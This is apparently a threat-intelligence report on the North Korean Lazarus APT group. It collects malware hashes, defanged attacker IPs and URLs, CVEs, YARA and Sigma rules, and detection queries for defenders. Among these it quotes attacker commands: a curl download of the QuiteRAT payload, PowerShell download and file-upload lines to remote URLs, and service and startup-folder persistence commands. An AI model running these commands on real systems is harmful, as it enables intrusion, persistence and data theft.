Lazarus Attacks

Overview

This report provides an analysis of Lazarus, an Advanced Persistent Threat (APT) group, focusing on indicators observed in campaigns, discovered malware samples, tools, and their targeted industries. The findings are based on data sourced from open intelligence and cybersecurity research. It is not an in-depth analysis of Lazarus tactics and tools but a collection of indicators to help identify similar activity, focusing on recent operations.

About Lazarus

Lazarus is a North Korean Advanced Persistent Threat (APT) group that has been active since 2009. North Korean cyber groups often share infrastructure, code, and resources. As a result, Lazarus is linked to clusters such as Bluenoroff, Andariel, TEMP.Hermit, and Kimsuky.

Origin Country

North Korea

Motivation

Espionage

First Seen

2009

Targeted Countries

  • USA
  • Spain
  • Russia
  • Brasil

Industry Attacked

  • Aerospace
  • IT
  • Agricultural
  • Manufacturing
  • Cryptocurrency
  • Software Engineering
  • Healthcare
  • Telecommunications

AnyDesk

Python Scripts in Attacks Group-IB Report

ProcDump

RATs with DLang and Telegram

Mimikatz

RATs with DLang and Telegram


BEAVERTAIL

Python Scripts in Attacks Group-IB Report

  • SHA-256: d502f822e6c52345227b64e3c326e2dbefdd8fc3f844df0821598f8d3732f763
  • SHA-256: a87b6664b718a9985267f9670e10339372419b320aa3d3da350f9f71dff35dd1

CiVETQ

Python Scripts in Attacks Group-IB Report

  • SHA-256: 7180f5a1c2554b77b4c21a727cca65cc0f9f023f6cac05b295d7172dad07023f
  • SHA-256: 306adab1769c48e09e5a637c82b6b32cd57e4895cc727860f02b558f406e7f34
  • SHA-256: 7f13ca9848086e3de9be971ea8d44ea97ec289c4565ce35b0049c8b534fccbef
  • SHA-256: 01b7306554f6e6bac63f5524588ff5c880b5afb4394074d1c132ecc554c72c83
  • SHA-256: 2f86acdfdf19c1719189fb121cc9391453d83989aa5c07d4144c9fb6585610cc

INVISIBLEFERRET

Unit42: North Korean Campaigns Targeting Job Hunters

  • SHA-256:: 92aeea4c32013b935cd8550a082aff1014d0cd2c2b7d861b43a344de83b68129

  • Sample: ANY.RUN

  • SHA-256:: 35434e903bc3be183fa07b9e99d49c0b0b3d8cf6cbd383518e9a9d753d25b672

  • SHA-256:: 305de20b24e2662d47f06f16a5998ef933a5f8e92f9ecadf82129b484769bbac

  • SHA-256:: 39e7f94684129efce4d070d89e27508709f95fa55d9721f7b5d52f8b66b95ceb

  • SHA-256:: ab198c5a79cd9dedb271bd8a56ab568fbd91984f269f075d8b65173e749a8fde

  • SHA-256:: 444f56157dfcf9fc2347911a00fe9f3e3cb7971dccf67e1359d2f99a35aed88e

  • SHA-256:: 4f50051ae3cb57f10506c6d69d7c9739c90ef21bfb82b14da6f4b407b6febac0

  • SHA-256:: 276863ee7b250419411b39c8539c31857752e54b53b072dffd0d3669f2914216

  • SHA-256:: 617c62da1c228ec6d264f89e375e9a594a72a714a9701ed3268aa4742925112b

  • SHA-256:: c547b80e1026d562ac851be007792ae98ddc1f3f8776741a72035aca3f18d277

  • SHA-256:: 03185038cad7126663550d2290a14a166494fdd7ab0978b98667d64bda6e27cc

  • SHA-256:: 2d300410a3edb77b5f1f0ff2aa2d378425d984f15028c35dfad20fc750a6671a

NICKELLOADER

ESET: Lazarus Targets Spanish Aerospace

  • SHA-1: C136DD71F45EAEF3206BF5C03412195227D15F38
  • SHA-1: E61672B23DBD03FE3B97EE469FA0895ED1F9185D

QUITERAT

QuietRAT: Insights from Talos Intelligence

The cURL command to immediately deploy the QuiteRAT binary from a malicious URL:

curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:

C:\windows\system32\cmd.exe /c systeminfo | findstr Logon

C:\windows\system32\cmd.exe /c ipconfig | findstr Suffix

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: commandLine:"*cmd.exe*/c* systeminfo | findstr *" Or commandLine:"*cmd.exe*/c* ipconfig | findstr *"

Persistence for the implant is achieved by issuing the following command to QuiteRAT:

C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: commandLine:"*cmd.exe*sc create*start= auto*binPath=*C:\\Users\\"


  • SHA-256: ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
  • Sample: ANY.RUN

NiNERAT

DLang and Telegram-Based RATs

A malicious service is created to establish persistence using the following command, leveraging a misleading name (nsIookup.exe with a capital "i") to evade detection.

sc create Aarsvc_XXXXXX binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p type=own start=auto DisplayName=Agent Activation Runtime_XXXXXX

Below are some of the commands run by NineRAT for reconnaissance, including checking the OS architecture and listing installed antivirus products:

wmic os get osarchitecture

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: commandLine:"WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName"


  • SHA-256:: 534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433

  • Sample: ANY.RUN

  • SHA-256:: ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4

  • Sample: ANY.RUN

  • SHA-256:: 47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30

  • SHA-256:: f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59

  • SHA-256:: 5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541

  • SHA-256:: 82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def

DLRAT

Dlang RATs Using Telegram C2

  • SHA-256: e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f

  • Sample: ANY.RUN

  • SHA-256: 9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a

  • Sample: ANY.RUN

BOTTOMLOADER

Dlang RATs Using Telegram C2

This command is used by BottomLoader to download the next-stage payload from a hardcoded remote URL using a PowerShell command.

powershell Invoke-webrequest -URI <URL> -outfile <file_location_on_system>

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: commandLine:"powershell Invoke-webrequest -URI*-outfile*"

This command is used to upload a file from the specified file_path to a remote_url using PowerShell.

powershell (New-Object System.Net.WebClient).UploadFile('<file_path>','<remote_url>’)

BottomLoader achieves persistence by placing a “.URL” file in the Startup folder, which, when executed, runs a PowerShell command to download the payload.

echo [InternetShortcut] > "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo URL="<Remote_URL>" >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo IconFile=C:\WINDOWS\system32\SHELL32.dll >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

echo IconIndex=20 >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

  • SHA-256: 0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f
  • Sample: ANY.RUN

HAZYLOAD

Dlang RATs Using Telegram C2

  • SHA-256: 000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee
  • Sample: ANY.RUN

SIGNBT

Lazarus SIGNBT Malware

IOC Summary

Python Scripts in Attacks Group-IB Report

IOCs (Click to expand)
  • SHA-256: d502f822e6c52345227b64e3c326e2dbefdd8fc3f844df0821598f8d3732f763
  • SHA-256: a87b6664b718a9985267f9670e10339372419b320aa3d3da350f9f71dff35dd1
  • SHA-256: 7180f5a1c2554b77b4c21a727cca65cc0f9f023f6cac05b295d7172dad07023f
  • SHA-256: 306adab1769c48e09e5a637c82b6b32cd57e4895cc727860f02b558f406e7f34
  • SHA-256: 7f13ca9848086e3de9be971ea8d44ea97ec289c4565ce35b0049c8b534fccbef
  • SHA-256: 01b7306554f6e6bac63f5524588ff5c880b5afb4394074d1c132ecc554c72c83
  • SHA-256: 2f86acdfdf19c1719189fb121cc9391453d83989aa5c07d4144c9fb6585610cc
  • SHA-256: 1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069
  • SHA-256: fd9e8fcc5bda88870b12b47cbb1cc8775ccff285f980c4a2b683463b26e36bf0
  • SHA-256: a87b6664b718a9985267f9670e10339372419b320aa3d3da350f9f71dff35dd1
  • SHA-256: 36cac29ff3c503c2123514ea903836d5ad81067508a8e16f7947e3e675a08670
  • SHA-256: d502f822e6c52345227b64e3c326e2dbefdd8fc3f844df0821598f8d3732f763
  • SHA-256: d5c0b89e1dfbe9f5e5b2c3f745af895a36adf772f0b72a22052ae6dfa045cea6
  • SHA-256: 0621d37818c35e2557fdd8a729e50ea662ba518df8ca61a44cc3add5c6deb3cd
  • SHA-256: c0110cb21ae0e7fb5dec83ca90db9e250b47a394662810f230eb621b0728aa97
  • SHA-256: d801ad1beeab3500c65434da51326d7648a3c54923d794b2411b7b6a2960f31e
  • SHA-256: 000b4a77b1905cabdb59d2b576f6da1b2ef55a0258004e4a9e290e9f41fb6923
  • SHA-256: 24b89c77eaeebd4b02c8e8ab6ad3bd7abaa18893ecd469a6a04eda5e374dd305
  • SHA-256: b8e69d6a766b9088d650e850a638d7ab7c9f59f4e24e2bc8eac41c380876b0d8
  • SHA-256: 9abf6b93eafb797a3556bea1fe8a3b7311d2864d5a9a3687fce84bc1ec4a428c
  • SHA-256: 0f5f0a3ac843df675168f82021c24180ea22f764f87f82f9f77fe8f0ba0b7132
  • SHA-256: de6f9e9e2ce58a604fe22a9d42144191cfc90b4e0048dffcc69d696826ff7170
  • SHA-256: 9e3a9dbf10793a27361b3cef4d2c87dbd3662646f4470e5242074df4cb96c6b4
  • SHA-256: 06384aedc3614ee73cc7319e30975fca00d43981b626ba5f2b993a254e20d818
  • SHA-256: 0620a7fa8c6e416d96fe3d3baf4cd925b1a72ce1db8d3eacfb1e10c5fe434962
  • SHA-256: cd13a9c92210ada940a44769874dd6716f85c4e4e9d7323ec5789c7b253d937d
  • SHA-256: dcde59721b78e6797ee7f79c0e19c4a1c5a7806d20cbfa4a6ebb8efca189baf3
  • SHA-256: 9110515c2d5f6f48871f0631f411d55f2f0307286e6678952f5d86abe5ce11a9
  • SHA-256: ddc4162a71f13cc39519c0f8917b960f3536c47be710bde010bb6e87afe16bc5
  • SHA-256: c373c4c2922f7ca49e2cf5670052d071b15649164ed32a321b7c6fb1a7f2ca6b
  • SHA-256: b378d389fd31c6cb65fc85ea960b609049c5f97266cafcbfc6d261fa09355cc0
  • SHA-256: b653153a94c275f8f1156298c905b86943cb2a63c8b2211e65cf2a1a671c98d1
  • SHA-256: 14e52430f1d1fa390973294d50849ee500061758721c8e28424871812d237132
  • SHA-256: 0049e2f4f746aa0ec1713cb83dbf8e30d535c01e7b7f10133ae14da0c6a68d69
  • SHA-256: 23b2df9ae70e592c6d82ee1aa1edd00aee982fc2df859f813224a0c908106789
  • SHA-256: 64b1aca7b36e662132ae60c2d2df6ea5872239d2b2632d88fdf1b1f383e0d446
  • SHA-256: 2ed5e202190df967c06750ba11aa8486c309e21875594a68f3dff3abb01f569d
  • SHA-256: 1be03204709c037378ae96197700148303875a99b8f14838bdabfaceed5693e4
  • SHA-256: 47e876110f5e478a739ca3ad034707c1011c89d3a73a1047d0bfa5359a9cfe4b
  • SHA-256: 2a8c90885a8bea74cfe918f3ac6b939990e5ff25434a8c70f7a67d42e03936bd
  • SHA-256: ce572304131bd7c4fd34c3a919de403007c842d9c225d080b4ac31e7c8da606e
  • SHA-256: 9742da5b33866edb8b280fe10909f3f60bc5bf3a33e918d9889e4552f5ce25e3
  • SHA-256: 301678669e05064d13f1912caae530f0b23f5c83a98352e4b0b53a19128a40cf
  • SHA-256: d8806fb404bf29e4a3941c912cbb48553ad5340e1b7195a94e6abf8d75b9102c
  • SHA-256: 7e378c2f0a92c355473b2e2d25d6df9d075ccf89048f7ab10dd4d30c2243a6b1
  • SHA-256: a6c9f8c06fdb15de26656e5e490990984634e2c1c05232d3260c29970f9dd6f3
  • SHA-256: 887594f18cdbbae4ceef62572e813810b75c8edfb3c4971097d8f8a74f9f103c
  • SHA-256: 1e5d3ee4c0eb6d67f6bc812cf492c53683962252ddb6ac5285ed251ab4a48ddc
  • SHA-256: d356a0668a0f7827d8041eaebdbc003a5b96fe0d82a353ab802dab31bdc5c323
  • SHA-256: c19cdedf8f800d2eeccd5094d7d054dcc00a998356eeae822c14a25f0ce400f2
  • ip: 23.106.253[.]194
  • ip: 45.61.129[.]255
  • ip: 45.61.130[.]0
  • ip: 45.61.131[.]218
  • ip: 45.61.160[.]14
  • ip: 45.61.169[.]187
  • ip: 45.140.147[.]208
  • ip: 67.203.7[.]171
  • ip: 67.203.7[.]245
  • ip: 77.37.37[.]81
  • ip: 91.92.120[.]135
  • ip: 95.164.17[.]24
  • ip: 144.172.74[.]48
  • ip: 144.172.79[.]23
  • ip: 147.124.212[.]89
  • ip: 147.124.213[.]11
  • ip: 147.124.213[.]29
  • ip: 147.124.212[.]146
  • ip: 147.124.214[.]129
  • ip: 147.124.214[.]131
  • ip: 147.124.214[.]237
  • ip: 167.88.36[.]13
  • ip: 167.88.168[.]152
  • ip: 167.88.168[.]24
  • ip: 172.86.97[.]80
  • ip: 172.86.98[.]143
  • ip: 172.86.98[.]240
  • ip: 172.86.123[.]35
  • ip: 173.211.106[.]101
  • ip: 185.235.241[.]208
  • URL: hxxp://23.106.253[.]194:1244
  • URL: hxxp://45.140.147[.]208:54321
  • URL: hxxp://95.164.17[.]24:1224
  • URL: hxxp://185.235.241[.]208:1224
  • URL: hxxp://freeconference[.]io
  • URL: hxxp://mirotalk[.]net
  • URL: hxxp://ipcheck[.]cloud
  • URL: hxxp://regioncheck[.]net

QuietRAT: Insights from Talos Intelligence

IOCs (Click to expand)
  • SHA-256: ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
  • SHA-256: db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
  • SHA-256: 773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df
  • SHA-256: 05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d
  • SHA-256: e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe
  • ip: 146.4.21[.]94
  • ip: 109.248.150[.]13
  • ip: 108.61.186[.]55
  • URL: hxxp[:]//146.4.21.94/tmp/tmp/comp.dat
  • URL: hxxp[:]//146.4.21.94/tmp/tmp/log.php
  • URL: hxxp[:]//146.4.21.94/tmp/tmp/logs.php
  • URL: hxxp[:]//ec2-15-207-207-64.ap-south-1.compute.amazonaws.com/resource/main/rawmail.php
  • URL: hxxp[:]//109.248.150.13/EsaFin.exe
  • URL: hxxp[:]//146.4.21.94/boards/boardindex.php
  • URL: hxxp[:]//146.4.21.94/editor/common/cmod

3CX Supply-Chain Attack

IOCs (Click to expand)
  • SHA-1: F6760FB1F8B019AF2304EA6410001B63A1809F1D
  • SHA-1: 3A63477A078CE10E53DFB5639E35D74F93CEFA81
  • SHA-1: 9D8BADE2030C93D0A010AA57B90915EB7D99EC82
  • SHA-1: 0CA1723AFE261CD85B05C9EF424FC50290DCE7DF
  • domain: od[.]lk
  • domain: journalide[.]org
  • ip: 38.108.185[.]79
  • ip: 38.108.185[.]115
  • ip: 172.93.201[.]88
  • ip: 23.254.211[.]230

'DeTankZone' Campaign SOCRadar Report

IOCs (Click to expand)
  • SHA-256: 7353AB9670133468081305BD442F7691CF2F2C1136F09D9508400546C417833A
  • SHA-256: 59A37D7D2BF4CFFE31407EDD286A811D9600B68FE757829E30DA4394AB65A4CC
  • domain: detankzone[.]com
  • domain: ccwaterfall[.]com

ESET: Lazarus Targets Spanish Aerospace

IOCs (Click to expand)
  • SHA-1: 38736CA46D7FC9B9E5C74D192EEC26F951E45752
  • SHA-1: C273B244EA7DFF20B1D6B1C7FD97F343201984B3
  • SHA-1: E18B9743EC203AB49D3B57FED6DF5A99061F80E0
  • SHA-1: C830B895FB934291507E490280164CC4234929F0
  • domain: bug.restoroad[.]com
  • domain: hurricanepub[.]com
  • domain: turnscor[.]com
  • domain: mantis.quick.net[.]pl
  • domain: nrfm[.]lk
  • domain: www.radiographers[.]org
  • domain: kapata-arkeologi.kemdikbud.go[.]id
  • domain: barsaji.com[.]mx
  • domain: www.keewoom.co[.]kr
  • domain: kerstpakketten.horesca-meppel[.]nl
  • domain: kittimasszazs[.]hu
  • domain: nrfm[.]lk
  • ip: 175.207.13[.]231
  • ip: 50.192.28[.]29
  • ip: 199.188.206[.]75
  • ip: 78.11.12[.]13
  • ip: 160.153.33[.]195
  • ip: 67.225.140[.]4
  • ip: 185.51.65[.]233
  • ip: 178.251.26[.]65
  • ip: 89.187.86[.]214
  • ip: 46.105.57[.]169
  • ip: 118.98.221[.]14
  • URL: hxxps[:]//www.radiographers[.]org/aboutus/aboutus.php
  • URL: hxxp[:]//bug.restoroad[.]com/admin/view_status.php
  • URL: hxxps[:]//hurricanepub[.]com/include/include.php
  • URL: hxxps[:]//turnscor[.]com/wp-includes/contacts.php
  • URL: hxxp[:]//www.keewoom.co[.]kr/prod_img/201409/prod.php
  • URL: hxxps[:]//kittimasszazs[.]hu/images/virag.php
  • URL: hxxp[:]//barsaji.com[.]mx/src/recaptcha/index.php
  • URL: hxxps[:]//kapata-arkeologi.kemdikbud.go[.]id/pages/payment/payment.php
  • URL: hxxps[:]//nrfm[.]lk/wp-includes/SimplePie/content.php
  • URL: hxxp[:]//mantis.quick.net[.]pl/library/securimage/index.php
  • URL: hxxps[:]//kerstpakketten.horesca-meppel[.]nl/wp-content/plugins/woocommerce/lib.php

New Supply Chain Attack Campaign Kaspersky Report

IOCs (Click to expand)
  • MD5: 54df2984e833ba2854de670cce43b823
  • MD5: 31af3e7fff79bc48a99b8679ea74b589
  • MD5: e6fa116ef2705ecf9677021e5e2f691e
  • MD5: 88a96f8730b35c7406d57f23bbba734d
  • MD5: Ae00b0f490b122ebab614d98bb2361f7
  • MD5: E89fa6345d06da32f9c8786b65111928
  • MD5: 9cd90dff2d9d56654dbecdcd409e1ef3
  • ip: 221.141.3[.]76
  • URL: hxxp://ucware[.]net/skins/PHPMailer-master/index[.]php
  • URL: hxxps://hspje[.]com:80/menu6/teacher_qna[.]asp
  • URL: hxxps://yoohannet[.]kr/min/tmp/process/proc[.]php
  • URL: hxxps://safemotors[.]co[.]kr/daumeditor/pages/template/template[.]asp
  • URL: hxxps://www[.]happinesscc[.]com/mobile/include/func[.]asp
  • URL: hxxp://samwoosystem[.]co[.]kr/board/list/write[.]asp
  • URL: hxxps://vnfmal2022[.]com/niabbs5/upload/gongji/index[.]php
  • URL: hxxp://www[.]khmcpharm[.]com/Lib/Modules/HtmlEditor/Util/read[.]cer
  • URL: hxxp://www[.]friendmc[.]com/upload/board/asp20062107[.]asp
  • URL: hxxps://www[.]seouldementia[.]or[.]kr/_manage/inc/bbs/jiyeuk1_ok[.]asp
  • URL: hxxps://www[.]droof[.]kr/Board/htmlEdit/PopupWin/Editor[.]asp
  • URL: hxxps://www[.]healthpro[.]or[.]kr/upload/naver_editor/subview/view[.]inc
  • URL: hxxps://mainbiz[.]or[.]kr/include/common[.]asp
  • URL: hxxps://www[.]hanlasangjo[.]com/editor/pages/page[.]asp
  • URL: hxxps://warevalley[.]com/en/common/include/page_tab[.]asp
  • URL: hxxp://www[.]hankooktop[.]com/ko/company/info[.]asp
  • URL: hxxps://admin[.]esangedu[.]kr/XPaySample/submit[.]php
  • URL: hxxps://api[.]shw[.]kr/login_admin/member/login_fail[.]php
  • URL: hxxps://www[.]muijae[.]com/daumeditor/pages/template/simple[.]asp
  • URL: hxxps://www[.]blastedlevels[.]com/levels4SqR8/measure[.]asp
  • URL: hxxps://new-q-cells[.]com/upload/newsletter/cn/frame[.]php
  • URL: hxxp://www[.]vietjetairkorea[.]com/INFO/info[.]asp
  • URL: hxxps://swt-keystonevalve[.]com/data/editor/index[.]php
  • URL: hxxps://little-pet[.]com/web/board/skin/default/read[.]php
  • URL: hxxp://ictm[.]or[.]kr/UPLOAD_file/board/free/edit/index[.]php
  • URL: hxxps://pms[.]nninc[.]co[.]kr/app/content/board/inc_list[.]asp
  • URL: hxxp://theorigin[.]co[.]kr:443/admin/management/index[.]php
  • URL: hxxps://mainbiz[.]or[.]kr/SmartEditor2/photo_uploader/popup/edit[.]asp
  • URL: hxxps://www[.]friendmc[.]com:80/upload/board/asp20062107[.]asp
  • URL: hxxp://yoohannet[.]kr/min/tmp/process/proc[.]php
  • URL: hxxps://www[.]seoulanesthesia[.]or[.]kr/mail/mail_211230[.]html
  • URL: hxxps://www[.]medric[.]or[.]kr/Controls/Board/certificate[.]cer
  • URL: hxxps://www[.]muijae[.]com/daumeditor/pages/template/template[.]asp
  • URL: hxxps://kscmfs[.]or[.]kr/member/handle/log_proc[.]php
  • URL: hxxps://www[.]nonstopexpress[.]com/community/include/index[.]asp
  • URL: hxxps://www[.]siriuskorea[.]co[.]kr/mall/community/bbs_read[.]asp
  • URL: hxxps://hicar[.]kalo[.]kr/data/rental/Coupon/include/inc[.]asp
  • URL: hxxps://kstr[.]radiology[.]or[.]kr/upload/schedule/29431_1687715624[.]inc
  • URL: hxxps://pediatrics[.]or[.]kr/PubReader/build_css[.]php

DPRK Targets Blockchain Engineers with KANDYKORN

IOCs (Click to expand)
  • SHA-256: 3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940
  • SHA-256: 2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1
  • SHA-256: 927b3564c1cf884d2a05e1d7bd24362ce8563a1e9b85be776190ab7f8af192f6
  • domain: tp-globa[.]xyz
  • ip: 23.254.226[.]90
  • ip: 192.119.64[.]43
  • URL: hxxp[:]//tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC

DLang and Telegram-Based RATs

IOCs (Click to expand)
  • ip: 27.102.113[].]93
  • ip: 185.29.8[.]53
  • ip: 155.94.208[.]209
  • ip: 162.19.71[.]175
  • ip: 201.77.179[.]66
  • URL: hxxp[:]//27.102.113.93/inet.txt
  • URL: hxxp[:]//162.19.71.175:7443/sonic/bottom.gif
  • URL: hxxp[:]//201.77.179.66:8082/img/lndex.php
  • URL: hxxp[:]//201.77.179.66:8082/img/images/header/B691646991EBAEEC.gif
  • URL: hxxp[:]//201.77.179.66:8082/img/images/header/7AEBC320998FD5E5.gif

CVEs Used

  • FudModule Evolution

    • CVE-2024-38193
    • CVE-2024-21338
  • QuietRAT: Insights from Talos Intelligence

    • CVE-2022-47966
  • New Campaign Targets Cryptocurrency via Zero-Day Exploit, SOCRadar Report

    • CVE-2024-4947

YARA Rules

Avast GitHub Repository: FudModule YARA Rules


rule fudmodule_v2_sequences
{
    meta:
        reference = "https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/"
    strings:
        $s00 = "overwrite pvmode failed. %X"
        $s01 = "%s\\temp\\tem1245.tmp"
        $s02 = "get NTKernelBase and some DriverBase failed."
        $s03 = "ClearVaccineNotifyRoutine failed."
        $s04 = "DisableUserEtwSource (%d/%d) passed."
        $s05 = "ClearVaccineNetworkFilterRoutine skipped."

        $h00 = {65 48 8B 04 25 30 00 00 00 48 8B CB 48 8B 50 60 48 89 13 80 7A 02 01 75 16 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 01 00 00 F0 E9}
        $h01 = {48 C7 81 F0 00 00 00 20 01 00 00 48 C7 81 F8 00 00 00 A0 00 00 00 48 C7 81 08 01 00 00 A0 00 00 00 48 C7 81 18 01 00 00 68 00 00 00 48 C7 81 20 01 00 00 40 00 00 00}
        $h02 = {05 9F B5 FF FF 83 F8 04 0F 87 ?? ?? ?? ?? 48 C7 81 28 01 00 00 80 10 00 00}
        $h03 = {48 A3 08 00 00 80 00 00 00 00 48 8B 43 38 48 8B 4B 60}
        $h04 = {C7 45 ?? 65 72 53 69 C7 45 ?? 6C 6F 4E 61 66 C7 45 ?? 6D 65 C6 45 ?? 00 66 C7 45 ?? 48 8D}
        $h05 = {66 C7 45 ?? 4C 8B C6 45 ?? 3D 66 C7 45 ?? 48 8D C6 45 ?? 05 C7 45 ?? 46 6C 74 45 C7 45 ?? 6E 75 6D 65}
    condition:
        2 of them
}

Avast GitHub Repository: FudModule YARA Rules


rule fudmodule_v3_sequences
{
    meta:
        author = "Luigino Camastra, GenDigital"
        reference = "https://www.gendigital.com/blog/preview/lazarus-fudmodule"
    strings:
        $s00 = "Success." // 0x14001acf0
        $s01 = "remote_exec failed." // 0x14001ad00
        $s02 = "init_env failed." // 0x14001ac90
        $s03 = "GetGodMode failed" // 0x14001acc0
        $s04 = "RemoteDllExecute passed." // 0x14001b268
        $s05 = "CreateRemoteProcess passed." // 0x14001b220
        $s06 = "GetSystemHandle passed." // 0x14001b208
        $s07 = "SuspendDefender skipped." // 0x14001b1b8
        $s08 = "DisableUserEtwSource (%d/%d) passed." // 0x14001b180
        $s09 = "EtwpHostSiloState is Null." // 0x14001b140
        $s10 = "Get EtwpHostSiloState failed." // 0x14001b160
        
        $h00 = { 8A 44 0E ?? 41 32 C4 88 01 B0 0D 48 FF C1 41 F6 }
        $h01 = { 4? 8B DF 4? 8D 47 D0 4? C1 E0 10 4? C1 E3 10 4? }
        $h02 = { B? 05 00 00 00 4? 81 E3 FF FF 0F 00 4? 33 D8 4C }
    condition:
        3 of them
}

Neo23x0 GitHub Repository


rule MAL_Gopuram_Apr23 {
    meta:
        description = "Detects Lazarus Gopuram malware"
        reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
        license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
        author = "Arnim Rupp (https://github.com/ruppde)"
        date = "2023-04-04"
        hash = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
        hash = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
        id = "e0bb43b0-542b-5c8e-bcba-0326f80efaa0"
    strings:
        // VTgrep content:"%s.TxR.0.regtrans-ms" hits only the 2 hashes above
        $path = "%s.TxR.0.regtrans-ms"
    condition:
        uint16(0) == 0x5A4D and $path and filesize < 10MB
}

Sigma Rules:

SigmaHQ: Rule for Lazarus Side-Loading Activity


title: Lazarus APT DLL Sideloading Activity
id: 24007168-a26b-4049-90d0-ce138e13a5cf
status: test
description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
references:
    - https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/
    - https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/
author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-18
tags:
    - attack.defense-evasion
    - attack.privilege-escalation
    - attack.t1574.001
    - attack.t1574.002
    - attack.g0032
    - detection.emerging-threats
logsource:
    product: windows
    category: image_load
detection:
    selection_mscoree:
        Image: 'C:\ProgramShared\PresentationHost.exe'
        ImageLoaded: ':\ProgramShared\mscoree.dll'
    selection_colorui:
        Image: 'C:\ProgramData\Adobe\colorcpl.exe'
        ImageLoaded: 'C:\ProgramData\Adobe\colorui.dll'
    selection_mapistub:
        Image: 'C:\ProgramData\Oracle\Java\fixmapi.exe'
        ImageLoaded: 'C:\ProgramData\Oracle\Java\mapistub.dll'
    selection_hid:
        Image: 'C:\ProgramData\Adobe\ARM\tabcal.exe'
        ImageLoaded: 'C:\ProgramData\Adobe\ARM\HID.dll'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high

References

  • https://www.group-ib.com/blog/apt-lazarus-python-scripts/?data=7sd78e8denis89h269omelchenko8yrjs8
  • https://www.gendigital.com/blog/news/innovation/lazarus-fudmodule-v3
  • https://blog.talosintelligence.com/lazarus-quiterat/
  • https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
  • https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/
  • https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn
  • https://securelist.com/unveiling-lazarus-new-campaign/110888/
  • https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/
  • https://socradar.io/lazarus-exploits-google-chrome-zero-day-to-steal-cryptocurrency-in-detankzone-campaign-cve-2024-4947/
  • https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/